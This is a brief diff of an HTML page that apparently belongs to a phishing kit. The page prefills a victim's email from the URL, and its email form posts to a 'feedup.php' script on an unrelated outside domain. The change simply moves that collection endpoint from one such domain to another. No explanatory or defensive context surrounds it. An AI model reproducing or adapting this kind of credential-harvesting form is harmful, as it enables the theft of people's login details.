--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://grandfatherscatter.com/cgi-bin/Log/feedup.php" method="post">
+                <form action="https://moesadult.com//cgi-bin/feedup.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
